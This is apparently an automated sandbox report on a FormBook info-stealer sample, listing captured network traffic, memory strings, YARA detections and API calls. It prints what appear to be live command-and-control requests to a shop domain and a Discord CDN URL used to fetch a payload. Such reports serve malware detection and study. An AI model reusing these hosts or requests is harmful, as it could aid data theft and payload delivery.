6f 57 78 65 38 48 35 36 6b 6a 37 77 61 76 62 68 4a 59 50 74 37 6f 45 4e 68 4f 38 4d 6c 63 6d 72 69 53 6c 50 4f 57 49 4b 37 61 28 5a 7e 76 37 2d 33 37 73 76 32 6e 48 78 7a 35 76 4c 34 46 45 77 70 38 4a 37 34 78 74 6d 62 6d 6b 57 4c 63 69 69 54 73 42 43 50 64 47 46 34 67 56 41 58 50 4f 62 37 7a 55 49 54 5a 79 49 71 75 38 30 68 79 63 36 64 68 48 77 62 50 45 78 68 41 66 4b 43 38 4a 76 30 55 4b 69 4b 75 65 38 55 53 79 49 65 63 79 34 61 69 51 65 64 6b 5a 6f 50 66 63 64 73 56 31 52 66 57 6b 6c 47 4f 62 66 45 53 65 71 5a 65 77 48 65 63 4e 70 6a 63 42 78 47 72 66 46 78 71 6b 45 66 48 49 50 6d 4c 77 32 57 35 51 31 46 4b 36 36 7e 39 49 55 52 46 4a 4f 32 57 4c 32 4a 62 33 38 62 4e 67 72 63 69 49 73 32 62 33 47 77 46 6
          Source: global trafficHTTP traffic detected: GET /oav/?k0GdCl1=OGiTtEl8oZpE8Sv3fxvazbyjtykFcfSLP9Tv9n1IDimktFHXuVh+PBX3cY6ZEpQG1B1V&tZU4=NX1pk HTTP/1.1Host: www.mybabyshop4you.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
          Source: unknownHTTP traffic detected: POST /oav/ HTTP/1.1Host: www.mybabyshop4you.comConnection: closeContent-Length: 717Cache-Control: no-cacheOrigin: http://www.mybabyshop4you.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mybabyshop4you.com/oav/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6b 30 47 64 43 6c 31 3d 47 6b 75 70 7a 68 42 47 6b 49 41 36 75 52 6d 52 4f 55 75 63 71 66 47 31 39 67 67 75 64 5f 32 68 4e 37 57 54 35 68 42 4e 47 54 61 65 73 55 47 4b 72 48 49 4a 4d 78 4b 6f 66 34 4b 57 5a 4a 51 33 35 44 51 5a 7e 6f 46 49 30 56 67 64 70 69 4d 77 6d 55 59 57 47 37 6a 5a 53 6d 30 75 4d 4b 68 64 30 49 30 65 63 61 67 41 4d 78 31 58 39 33 5a 65 79 70 50 69 37 4c 44 41 5a 41 7a 41 37 69 55 43 52 46 76 51 77 54 69 46 73 73 56 54 68 70 53 36 36 79 6b 79 53 55 54 41 6e 50 6b 66 75 77 4a 78 72 79 31 6b 6c 6a 56 6a 49 50 33 37 72 62 46 58 7e 52 54 52 64 73 4c 6d 77 31 53 4d 61 55 58 47 37 7a 55 68 5a 31 47 36 43 74 41 57 73 62 6a 34 46 58 65 54 55 69 41 51 65 49 71 48 64 4f 28 77 67 6a 28 78 6f 53 4a 61 46 44 57 61 32 38 39 49 74 36 45 64 4c 65 33 36 48 63 41 43 37 79 4b 6f 75 44 7a 4a 57 70 68 61 31 34 52 73 47 4e 69 4b 74 6f 51 47 33 77 46 51 58 71 53 6f 65 34 5a 41 55 58 69 74 33 7a 53 5f 42 49 55 7a 52 67 6f 74 56 47 6f 4c 56 76 6d 34 76 72 73 79 79 77 32 4c 64 66 34 34 4d 44 37 69 67 74 63 64 34 34 63 65 35 55 64 32 4d 4e 72 78 5a 4c 38 78 58 62 74 4f 51 48 4a 50 74 43 39 36 71 6b 48 31 4a 62 4a 62 51 37 5a 46 58 39 70 46 57 6d 71 4f 78 35 69 6b 47 41 58 58 6a 76 5a 63 48 53 73 5a 5a 42 6e 6a 68 39 36 4a 41 34 6b 74 76 68 55 5f 53 6a 78 4d 52 33 52 65 4c 52 77 50 4b 4e 42 64 71 53 59 64 6a 36 31 6f 47 37 39 4e 41 33 6b 71 6f 32 65 41 70 48 72 73 53 56 49 42 75 37 39 76 79 7a 44 52 51 4f 55 6a 79 66 53 2d 32 75 49 51 32 4a 55 50 5a 5f 28 65 6c 62 54 65 63 2d 4e 75 76 44 37 72 50 56 6b 62 51 44 28 6f 53 52 34 4a 45 5f 53 64 44 45 6f 50 74 48 6d 35 76 38 4c 44 4e 39 30 68 46 69 6d 62 31 70 4c 36 37 58 70 2d 75 4b 69 31 6a 4e 6c 42 66 44 6a 36 31 46 34 30 28 36 6f 4c 45 36 6c 5a 70 72 56 2d 57 38 37 45 34 6c 32 5f 38 47 39 76 6b 6d 5a 4d 57 48 51 34 66 51 39 75 76 42 44 67 53 31 56 72 61 35 4c 31 61 35 57 6e 33 73 6e 63 78 7a 41 5a 7a 38 4e 6c 73 62 38 53 30 58 43 4d 43 48 39 54 50 4f 66 53 63 64 70 69 30 49 35 43 6a 49 7e 35 76 50 72 47 42 4c 43 35 7a 5a 4c 52 6b 35 72 41 36 4d 53 41 4b 54 76 36 72 76 38 49 56 6a 5a 5f 65 73 39 34 71 46 47 57 68 56 44 57 71 54 6d 64 58 33 79 5f 4c 31 78 2d 42 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: k0GdCl1=GkupzhBGkIA6uRmROUucqfG19ggud_2hN7WT5hBNGTaesUGKrHIJMxKof4KWZJQ35DQZ~oFI0VgdpiMwmUYWG7jZSm0uMKhd0I0ecagAMx1X93ZeypPi7LDAZAzA7iUCRFvQwTiFssVThpS66ykySUTAnPkfuwJxry1kljVjIP37rbFX~RTRdsLmw1SMaUXG7zUhZ1G6CtAWsbj4FXeTUiAQeIqHdO(wgj(xoSJaFDWa289It6EdLe36HcAC7yKouDzJWpha14RsGNiKtoQG3wFQXqSoe4ZAUXit3zS_BIUzRgotVGoLVvm4vrsyyw2Ldf44MD7igtcd44ce5Ud2MNrxZL8xXbtOQHJPtC96qkH1JbJbQ7ZFX9pFWmqOx5ikGAXXjv
          Source: Ijxlcmh_Signed_.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
          Source: Ijxlcmh_Signed_.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
          Source: explorer.exe, 00000004.00000000.324899208.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: Ijxlcmh_Signed_.exeString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Ijxlcmh_Signed_.exeString found in binary or memory: http://ocsp.comodoca.com0
          Source: Ijxlcmh_Signed_.exeString found in binary or memory: http://ocsp.thawte.com0
          Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.icog
          Source: Ijxlcmh_Signed_.exeString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
          Source: Ijxlcmh_Signed_.exeString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
          Source: Ijxlcmh_Signed_.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com07
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpLMEM
          Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
          Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpLMEMh
          Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpZ3
          Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
          Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/ocid=iehpK;
          Source: NETSTAT.EXE, 00000011.00000002.496313834.0000000003439000.00000004.00000001.sdmpString found in binary or memory: http://www.mybabyshop4you.com
          Source: NETSTAT.EXE, 00000011.00000002.496313834.0000000003439000.00000004.00000001.sdmpString found in binary or memory: http://www.mybabyshop4you.com/oav/
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: Ijxldrv.exe, 00000007.00000002.322506056.00000000034A0000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attac0
          Source: Ijxldrv.exe, 00000007.00000002.322506056.00000000034A0000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/720370823554138118/766538674925862932/Ijxlvnm
          Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/chrome/
          Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png4_
          Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.363576083.0000000000870000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.347301102.0000000010411000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.489865505.0000000000610000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.399200553.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.255722131.0000000010411000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.254037466.0000000003E50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.490058063.0000000000640000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.367185514.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.488550629.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.401382635.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.347219785.0000000003E40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.333441854.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.352439392.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.372602980.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.399815412.00000000049D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.324932466.0000000003D3C000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.333947953.0000000000DC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.366016750.0000000003060000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.400259752.0000000000A30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.254839755.0000000003F16000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.324842296.0000000003D00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.347253674.0000000003E7C000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Ijxlcmh_Signed_.exe.10410000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\NETSTAT.EXEDropped file: C:\Users\user\AppData\Roaming\4201TS0U\420logri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\NETSTAT.EXEDropped file: C:\Users\user\AppData\Roaming\4201TS0U\420logrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.363576083.0000000000870000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.363576083.0000000000870000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.347301102.0000000010411000.00000020.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.347301102.0000000010411000.00000020.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.489865505.0000000000610000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.489865505.0000000000610000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.399200553.0000000000F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.399200553.0000000000F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.255722131.0000000010411000.00000020.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.255722131.0000000010411000.00000020.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.254037466.0000000003E50000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.254037466.0000000003E50000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.490058063.0000000000640000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.490058063.0000000000640000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.367185514.0000000000F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.367185514.0000000000F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.488550629.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.488550629.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.401382635.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.401382635.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.347219785.0000000003E40000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.347219785.0000000003E40000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.333441854.0000000000AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.333441854.0000000000AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.352439392.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.352439392.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.372602980.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.372602980.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.399815412.00000000049D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.399815412.00000000049D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.324932466.0000000003D3C000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.324932466.0000000003D3C000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.333947953.0000000000DC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.333947953.0000000000DC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.366016750.0000000003060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.366016750.0000000003060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.400259752.0000000000A30000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.400259752.0000000000A30000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.254839755.0000000003F16000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.254839755.0000000003F16000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.324842296.0000000003D00000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.324842296.0000000003D00000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.347253674.0000000003E7C000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.347253674.0000000003E7C000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 18.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 18.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 12.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 12.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 18.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 18.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 15.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Ijxlcmh_Signed_.exe.10410000.7.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Ijxlcmh_Signed_.exe.10410000.7.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 15.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C795D0 NtClose,LdrInitializeThunk,2_2_04C795D0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C79540 NtReadFile,LdrInitializeThunk,2_2_04C79540
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C796E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_04C796E0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C79660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_04C79660
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C79780 NtMapViewOfSection,LdrInitializeThunk,2_2_04C79780
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C797A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_04C797A0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C79710 NtQueryInformationToken,LdrInitializeThunk,2_2_04C79710
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C798F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_04C798F0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C79840 NtDelayExecution,LdrInitializeThunk,2_2_04C79840
